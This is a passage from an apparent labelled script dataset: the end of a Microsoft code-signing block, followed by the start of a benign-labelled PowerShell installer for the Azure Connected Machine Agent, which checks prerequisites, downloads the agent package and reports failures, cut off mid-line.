BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGg0wghoJAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAQEbHQG/1crJ3IAAAAABAQwDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEILL0LNcTOl5fB4j3BOCsjqQo # x/Jicg70oB7mLdT2Lf6QMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAguvlSdQ+aHOtlqt3qDStyR9zo/8zPTmA7E78CkoQmxcCA1Pe/Fc7bR27 # kAKGPOWzYpoSgqLPZH8TLHGWb5DW304yAeKEDaJepK3RxvLtuC0ESjVwXRJIm1CU # kwf/7uUP5OP+jcykYCl5t3QT/H7xRqkySZOxXOmKM0ej3CswDkb6cv3k0i9aFN0V # e1QXR9Vk3zhfsP2gMcvDh15ljUeCZP7vXvhpfSPEA/FC4ovsCMg0wF2Dk6FYLsWi # 7rA3p2xglhJ+qfsbNsvdLGm6YmS8MBFvOGtREhroDc4Al9c/WeS7mibzrIyHH1jI # FZrWDwqZLh+Zq6eMLeA9fhhDdSFwsaGCF5cwgheTBgorBgEEAYI3AwMBMYIXgzCC # F38GCSqGSIb3DQEHAqCCF3AwghdsAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFSBgsq # hkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCDqK/wUM/q8wu/LS0NjcXUluzlq4Svtjs2LuNInT83VUwIGZwf/oHmL # GBMyMDI0MTAxNjE1MjgzNC4zODFaMASAAgH0oIHRpIHOMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTYwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Wg # ghHtMIIHIDCCBQigAwIBAgITMwAAAe+JP1ahWMyo2gABAAAB7zANBgkqhkiG9w0B # AQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD # VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEyMDYxODQ1 # NDhaFw0yNTAzMDUxODQ1NDhaMIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25z # MScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTYwMC0wNUUwLUQ5NDcxJTAjBgNV # BAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2UwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQCjC1jinwzgHwhOakZqy17oE4BIBKsm5kX4DUmCBWI0 # lFVpEiK5mZ2Kh59soL4ns52phFMQYGG5kypCipungwP9Nob4VGVE6aoMo5hZ9Nyt # XR5ZRgb9Z8NR6EmLKICRhD4sojPMg/RnGRTcdf7/TYvyM10jLjmLyKEegMHfvIwP # mM+AP7hzQLfExDdqCJ2u64Gd5XlnrFOku5U9jLOKk1y70c+Twt04/RLqruv1fGP8 # LmYmtHvrB4TcBsADXSmcFjh0VgQkX4zXFwqnIG8rgY+zDqJYQNZP8O1Yo4kSckHT # 43XC0oM40ye2+9l/rTYiDFM3nlZe2jhtOkGCO6GqiTp50xI9ITpJXi0vEek8AejT # 4PKMEO2bPxU63p63uZbjdN5L+lgIcCNMCNI0SIopS4gaVR4Sy/IoDv1vDWpe+I28 # /Ky8jWTeed0O3HxPJMZqX4QB3I6DnwZrHiKn6oE38tgBTCCAKvEoYOTg7r2lF0Iu # bt/3+VPvKtTCUbZPFOG8jZt9q6AFodlvQntiolYIYtqSrLyXAQIlXGhZ4gNcv4dv # 1YAilnbWA9CsnYh+OKEFr/4w4M69lI+yaoZ3L/t/UfXpT/+yc7hS/FolcmrGFJTB # YlS4nE1cuKblwZ/UOG26SLhDONWXGZDKMJKN53oOLSSk4ldR0HlsbT4heLlWlOEl # JQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFO1MWqKFwrCbtrw9P8A63bAVSJzLMB8G # A1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8GA1UdHwRYMFYwVKBSoFCG # Tmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUy # MFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggrBgEFBQcBAQRgMF4w # XAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2Vy # dHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3J0MAwG # A1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQD # AgeAMA0GCSqGSIb3DQEBCwUAA4ICAQAYGZa3aCDudbk9EVdkP8xcQGZuIAIPRx9K # 1CA7uRzBt80fC0aWkuYYhQMvHHJRHUobSM4Uw3zN7fHEN8hhaBDb9NRaGnFWdtHx # mJ9eMz6Jpn6KiIyi9U5Og7QCTZMl17n2w4eddq5vtk4rRWOVvpiDBGJARKiXWB9u # 2ix0WH2EMFGHqjIhjWUXhPgR4C6NKFNXHvWvXecJ2WXrJnvvQGXAfNJGETJZGpR4 # 1nUN3ijfiCSjFDxamGPsy5iYu904Hv9uuSXYd5m0Jxf2WNJSXkPGlNhrO27pPxgT # 111myAR61S3S2hc572zN9yoJEObE98Vy5KEM3ZX53cLefN81F1C9p/cAKkE6u9V6 # ryyl/qSgxu1UqeOZCtG/iaHSKMoxM7Mq4SMFsPT/8ieOdwClYpcw0CjZe5KBx2xL # a4B1neFib8J8/gSosjMdF3nHiyHx1YedZDtxSSgegeJsi0fbUgdzsVMJYvqVw52W # qQNu0GRC79ZuVreUVKdCJmUMBHBpTp6VFopL0Jf4Srgg+zRD9iwbc9uZrn+89odp # InbznYrnPKHiO26qe1ekNwl/d7ro2ItP/lghz0DoD7kEGeikKJWHdto7eVJoJhkr # UcanTuUH08g+NYwG6S+PjBSB/NyNF6bHa/xR+ceAYhcjx0iBiv90Mn0JiGfnA2/h # Lj5evhTcAjCCB3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUwDQYJKoZI # hvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # MjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eSAy # MDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoIC # AQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXIyjVX9gF/bErg4r25Phdg # M/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNEt6aORmsHFPPF # dvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6 # GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5LFGc6XBp # Dco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pGve2krnopN6zL64NF50Zu # yjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpGdc3E # XzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYrbqgSUei/BQOj0XOmTTd0 # lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q # GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSLW6CmgyFdXzB0kZSU2LlQ # +QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PA # PBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQIDAQABo4IB3TCCAdkw # EgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxG # NSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMFwGA1UdIARV # MFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEWM2h0dHA6Ly93d3cubWlj # cm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNVHSUEDDAK # BggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMC # AYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2UkFvX # zpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20v # cGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI # KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG # 9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwUtj5OR2R4sQaTlz0x # M7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmC # VgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhTdSRXud2f8449 # xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4rPf5KYnDvBewVIVCs/wM # nosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0DLzskYDS # PeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDFNLB62FD+CljdQDzHVG2d # Y3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+kKNxn # GSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdUCbFpAUR+fKFhbHP+Crvs # QWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL # jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTmdHRbatGePu1+oDEzfbzL # 6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggNQ # MIICOAIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp # bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw # b3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEn # MCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjk2MDAtMDVFMC1EOTQ3MSUwIwYDVQQD # ExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMKAQEwBwYFKw4DAhoDFQBL # cI81gxbea1Ex2mFbXx7ck+0g/6CBgzCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6rm93DAiGA8yMDI0MTAxNjA0MjE0 # OFoYDzIwMjQxMDE3MDQyMTQ4WjB3MD0GCisGAQQBhFkKBAExLzAtMAoCBQDqub3c # AgEAMAoCAQACAhWPAgH/MAcCAQACAhNyMAoCBQDquw9cAgEAMDYGCisGAQQBhFkK # BAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAIAgEAAgMBhqAwDQYJ # KoZIhvcNAQELBQADggEBACbJPRmIdE3WH1e57OYJ8eFfsWWTi/YXUdV83U5CZtOS # AT6Fp/tIe3Npo2sHXIHAV7q5+deIIsTzIppKrue349SQ7W2wwNggNLY+MMJpRyT7 # Z5w/WpEgAzZCZQMOzH9TrEs1QQiNQxMNip/ArKuiZydCnN2lpno6WR8AFUB4sBDI # r/lyChJEjnNFXJZv1n2yX3o9vKtBiCQLrdf/M+1MhxBX3eTDKBsmIleEC7Vwmu/W # BmiYgoraqVWsojYgmuUo2M+OGVOTyamb1Tq3BZll3I1vcySiHyHMHQfZM3cN1Mw/ # eMNII+HFu/eW1ZN6PlO+Z1enQzzQ3CfW1MCcEEoK6rYxggQNMIIECQIBATCBkzB8 # MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk # bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N # aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAe+JP1ahWMyo2gABAAAB # 7zANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0GCyqGSIb3DQEJEAEE # MC8GCSqGSIb3DQEJBDEiBCCySbv31hJqWTGie46i0ja0V5CqIRov4gVHYUEcY2QC # zjCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EIPBhKEW4Fo3wUz09NQx2a0Db # cdsX8jovM5LizHmnyX+jMIGYMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB # IDIwMTACEzMAAAHviT9WoVjMqNoAAQAAAe8wIgQg63C7e/ZiDyhwIXuZIZxhp/gw # jbHP1Li08qLFXSPFeH4wDQYJKoZIhvcNAQELBQAEggIAYfc41z8stFEzcfPZ9+uK # RAYRsOChPUHqs4lGfxrAPFBS6my4N9x45FjvtZfL1E5bpGyaCI2I2l0aWUP8oefE # KC5BquEBxgUrN+oov9I3+p0v0NamuIsgP5FB33cAzkB9P6VNdXLsMOmpelAFcnl5 # O+J2QCTWnAwkx51+aJV7y2yCWDlnixm3LnZRhBIp+C/aOVb1WdYXlPTtibDprYn5 # 2MWSEQ4LQ4Vmuw+dVeVE46mHI3nKermSZBafCQgTZmgWj8iCDH5USeNmNcK/J/89 # yOpJOkaEipATevCKMIdjCrPJdiYQrfnPdvyJ5ymdtOf8eNyeQIYecxwwjBhk3sEP # Id2LgpT7RNsBxIar4HGp3eJlNjVLt6mCxiZsDoEXdtyyLzUxgEo7tumBKgy6tBlW # J/iyhSg8ftCOPKyfGaEQVEFLyli98ViaDRBrCWWTWpPz+/f+pEUZ2WDmOAJGHYYb # yFyWs8LL/fd/gXhdCSjbuOd0OUaY+fQPZ+XlNskQstYb93CK0EhDRFJZ933XydD0 # H2EkSag/Sckiv2lurspi+ZhvgqAl1VJn/S/DOZRA/fgnNAMSrcEJVGcl/h4CXDrc # XwcvemzfcOhuQpsAQBxNzF84tMGS7j7yMGY4/bmggoF+Q0on3zVnQfqEHtlrsgwF # IINrtfJJ7dzNr8TcJ+v3mBg= # SIG # End signature block
combined_dataset/train/non-malicious/sample_65_64.ps1
sample_65_64.ps1
[CmdletBinding()] param ( [string]$OutFile, [string]$AltDownload, [string]$Proxy, [string]$AltHisEndpoint ) $ErrorActionPreference = 'Stop' $ProgressPreference = 'SilentlyContinue' $refVersion = [version] '4.5' $provider = 'Microsoft.HybridCompute' # Error codes used by azcmagent are in range of [0, 125]. # Installation scripts will use [127, 255]. Check install_linux_azcmagent.sh for the codes used for Linux script. $global:errorcode="AZCM0150" <# Throw a structured exception#> function Invoke-Failure { [CmdletBinding()] param( [Parameter(Mandatory=$true)] $Message, [Parameter(Mandatory=$true)] $ErrorCode, [Parameter(Mandatory=$false)] $Details ) $ex = new-object -TypeName System.Exception -ArgumentList @($Message) $ex.Data["Details"] = $details $ex.Data["ErrorCode"] = $errorcode throw $ex } function Test-AzureStackHCI() { [CmdletBinding()] param ( ) try { $product=Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName | select -ExpandProperty ProductName } catch { Write-Verbose -Message "Error $_ Unable to determine product SKU from registry" -Verbose # Will attempt to install anyway return $false } if ($product -eq 'Azure Stack HCI') { return $true } return $false } function Test-PowerShellVersion() { [CmdletBinding()] param ( ) Write-Verbose -Message "PowerShell version: $($PSVersionTable.PSVersion)" -Verbose return ($PSVersionTable.PSVersion -ge [Version]"3.0") } function Test-DotNetFramework() { [CmdletBinding()] param ( ) try { $installedVersion = [version] (Get-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full' -Name Version | select -ExpandProperty Version) } catch { Write-Verbose -Message "Error $_ Unable to determine .NET Framework version" -Verbose # Will attempt to install anyway return $true } Write-Verbose -Message ".NET Framework version: $installedVersion" -Verbose if ($installedVersion -ge $refVersion) { return $true } return $false } function Test-IsAzure() { [CmdletBinding()] param ( ) Write-Verbose -Message "Checking if this is an Azure virtual machine" -Verbose try { if ($PSVersionTable.PSVersion -ge [Version]"6.0") { $response = Invoke-WebRequest -UseBasicParsing -Uri "http://169.254.169.254/metadata/instance/compute?api-version=2019-06-01" -Headers @{Metadata = "true"} -NoProxy -TimeoutSec 1 -ErrorAction SilentlyContinue } else { $response = Invoke-WebRequest -UseBasicParsing -Uri "http://169.254.169.254/metadata/instance/compute?api-version=2019-06-01" -Headers @{Metadata = "true"} -TimeoutSec 1 -ErrorAction SilentlyContinue } if ($null -ne $response -and $response.StatusCode -eq 200) { $content = ConvertFrom-Json $($response.Content.ToString()) if ($null -ne $content.resourceId) { Write-Verbose -Message "Azure check indicates that we are in Azure" -Verbose return $true } } } catch { Write-Verbose -Message "Error $_ checking if we are in Azure" -Verbose return $false } return $false } function Get-MsiLogSummary() { [CmdletBinding()] param( [Parameter(Mandatory=$true)] [string]$LogPath ) try { $LogPath = Resolve-Path $LogPath Write-Verbose -Message "Reading Logs from $LogPath" -Verbose $patterns = @( "Installation success or error status", "Product: Azure Connected Machine Agent" ); $regex = "(" + ($patterns -join ")|(" ) + ")" Write-Verbose -Message "Looking for Patterns: $regex" -Verbose $inCustomAction = $false $logCustomAction = $false $inLockDownDirectory = $false $caOutput = new-object -TypeName System.Collections.ArrayList Get-Content $LogPath | % { # log interesting lines if ( ($_ -match $regex)) { $_ # output to pipeline } # Wix custom actions start with "Calling custom Action". Gather the log from the CA till we see if it passed # At the end, log that output only if it failed with "returned actual error" if ($_ -match "Calling custom action") { $inCustomAction = $true $logCustomAction = $false $inLockDownDirectory = ($_ -match "LockDownDirectory") } if ($_ -match "MSI \(s\)") { $inCustomAction = $false } if ($_ -match "returned actual error") { $logCustomAction = $true } if ($inCustomAction -and -not $inLockDownDirectory) { $null = $caOutput.Add($_) } if ($inCustomAction -and $inLockDownDirectory) { if ($_ -match "Unable to lock path" -or $_ -match "Failed to lock down directory") { $null = $caOutput.Add($_) } } if (-not $inCustomAction) { if($logCustomAction) { $caOutput # output saved lines to pipeline } $caOutput.Clear() } } } catch { # This code is optional so if something goes wrong we'll just swallow the error and have no details Write-Verbose -Message "Error while parsing MSI log: $_" -Verbose } } function Send-Failure { [CmdletBinding()] param ( [Parameter(Mandatory = $true)] [System.Exception] $Error, [Parameter(Mandatory = $true)] [string] $ErrorCode, [Parameter(Mandatory = $false)] [string] $AltHisEndpoint ) $hisEndpoint = "https://gbl.his.arc.azure.com" if ($env:CLOUD -eq "AzureUSGovernment") { $hisEndpoint = "https://gbl.his.arc.azure.us" } elseif ($env:CLOUD -eq "AzureChinaCloud") { $hisEndpoint = "https://gbl.his.arc.azure.cn" } elseif ($env:CLOUD -eq "AzureStackCloud") { if ($AltHisEndpoint) { $hisEndpoint = $AltHisEndpoint } else { Write-Warning "error in Send-Failure due to invalid his endpoint." return } } $message = "$Error" if ($Error.Data["Details"]) { $message = $Error.Data["Details"] } $message = $message.Substring(0, [Math]::Min($message.Length, 500)) if ( $env:PROVIDER_NAMESPACE ) { $provider = $env:PROVIDER_NAMESPACE } $logBody = @{subscriptionId="$env:SUBSCRIPTION_ID";resourceGroup="$env:RESOURCE_GROUP";tenantId="$env:TENANT_ID";location="$env:LOCATION";correlationId="$env:CORRELATION_ID";authType="$env:AUTH_TYPE";operation="onboarding";namespace="$provider";osType="windows";messageType="$ErrorCode";message="$message";} try { Invoke-WebRequest -UseBasicParsing -Uri "$hisEndpoint/log" -Method "PUT" -Body ($logBody | ConvertTo-Json) -ErrorAction SilentlyContinue } catch {} } # Based on the MSI error code, we may have some hint to provide as to the issue # See https://learn.microsoft.com/en-us/windows/win32/msi/error-codes function Get-MsiErrorDetails() { [CmdletBinding()] param( $exitCode ) $message = (net helpmsg $exitCode) -join "" $hint = "" $errorCode = "AZCM0149" # exitCode is the return value from msiexec. errorCode is the error code of the script switch($exitCode) { 1603 { # ERROR_INSTALL_FAILURE $hint = "A fatal error occurred during installation" $errorCode = "AZCM0156" } 1633 { # ERROR_INSTALL_PLATFORM_UNSUPPORTED $hint = "Unsupported: Azure Connected Machine Agent is only compatible with X64 operating systems" $errorCode = "AZCM0153" } } return [PSCustomObject]@{ Message = $message Hint = $hint ErrorCode = $errorCode } } function CheckRSOPLogonRights { # Checks RSOP to see if a group policy may prevent himds from running # Support PS 1-2 for initial requirements check even though PS4 is required for product if ($PSVersionTable.PSVersion.Major -ge 3) { $securitySettings = Get-CimInstance -Namespace "root/RSOP/Computer" -ClassName "RSOP_SecuritySettings" -ErrorAction SilentlyContinue -ErrorVariable "rsoperror" } else { $securitySettings = Get-WmiObject -Namespace "root/RSOP/Computer" -Class "RSOP_SecuritySettings" -ErrorAction SilentlyContinue -ErrorVariable "rsoperror" } if ($rsoperror -ne $null) { Write-Warning "Unable to retrieve RSOP data to check local security policy." return } # Find the RSOP results for SeLogonAsAService, might be empty $logonAsServicePolicy = $securitySettings | Where-Object { $_.UserRight -eq "SeServiceLogonRight" } $logonAsServicePrincipals = $logonAsServicePolicy | Select-Object -ExpandProperty AccountList # If the list is empty, contains NT SERVICE\ALL SERVICES (default), or contains NT SERVICE\himds then our service can run if ($logonAsServicePrincipals -and ` $logonAsServicePrincipals -notcontains "NT SERVICE\ALL SERVICES" -and ` $logonAsServicePrincipals -notcontains "NT SERVICE\himds" -and ` $logonAsServicePrincipals -notcontains "S-1-5-80-4215458991-2034252225-2287069555-1155419622-2701885083") { Write-Warning "The local security policy on this system will prevent the agent from loading. Contact your Group Policy administrator to ensure 'NT SERVICE\ALL SERVICES' is included in any Group Policy Objects that configure the Logon as a Service User Rights Assignment. See https://aka.ms/ArcServerURA for more information." Write-Warning "GPO ID: $($logonAsServicePolicy.GPOID)" } } function Check-Physical-Memory() { [CmdletBinding()] param ( ) $memory = (Get-CimInstance -ClassName Win32_PhysicalMemory | Measure-Object -Property Capacity -Sum).Sum / 1MB Write-Verbose -Message "Total Physical Memory: $memory MB" -Verbose } function Download-With-Retries() { [CmdletBinding()] param ( [Parameter(Mandatory=$true)][string]$downloadUri, [Parameter(Mandatory=$false)][int]$maxAttempts = 3 ) $attempts=1 do { try { if (([Uri]$downloadUri).Scheme -in @("https","http")) { Write-Verbose -Message "Downloading agent package from $downloadUri to $msiFile" -Verbose # It's a web site, download it if ($Proxy) { Invoke-WebRequest -UseBasicParsing -Proxy $Proxy -Uri $downloadUri -OutFile $msiFile } else { Invoke-WebRequest -UseBasicParsing -Uri $downloadUri -OutFile $msiFile } } else { # This could be a UNC path or a local file, just try and copy it Write-Verbose -Message "Copying agent package from $downloadUri to $msiFile" -Verbose Copy-Item $downloadUri $msiFile } return } catch { $attempts++ Write-Verbose -Message "Download failure: $_ ..Retrying..." -Verbose } } while ($attempts -le $maxAttempts) Invoke-Failure -ErrorCode "AZCM0148" -Message "Download of $downloadUri failed: $_" } try { #Check if PowerShell is running as administrator if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Invoke-Failure -Message "This script must be run as an administrator." -ErrorCode "AZCM0155" } # Ensure TLS 1.2 is accepted. Older PowerShell builds (sometimes) complain about the enum "Tls12" so we use the underlying value [Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor 3072 # Ensure TLS 1.3 is accepted, if this .NET supports it (older versions don't) try { [Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor 12288 } catch {} Write-Verbose -Message "Installing Azure Connected Machine Agent" -Verbose $validPowerShell = Test-PowerShellVersion if (-Not $validPowerShell) { Invoke-Failure -Message "Azure Connected Machine Agent requires PowerShell version 3.0 or later" -ErrorCode "AZCM0154" } Check-Physical-Memory $hci = Test-AzureStackHCI if ($hci) { Invoke-Failure -Message "This server is running Azure Stack HCI and should be connected to Azure Arc using the built-in registration experience: https://aka.ms/install-arc-on-hci-host" -ErrorCode "AZCM0152" } $validFramework = Test-DotNetFramework if (-Not $validFramework) { Invoke-Failure -Message "Azure Connected Machine Agent requires .NET Framework version $refVersion or later" -ErrorCode "AZCM0151" } $inAzure = Test-IsAzure if ($inAzure) { $override = [System.Environment]::GetEnvironmentVariable("MSFT_ARC_TEST", 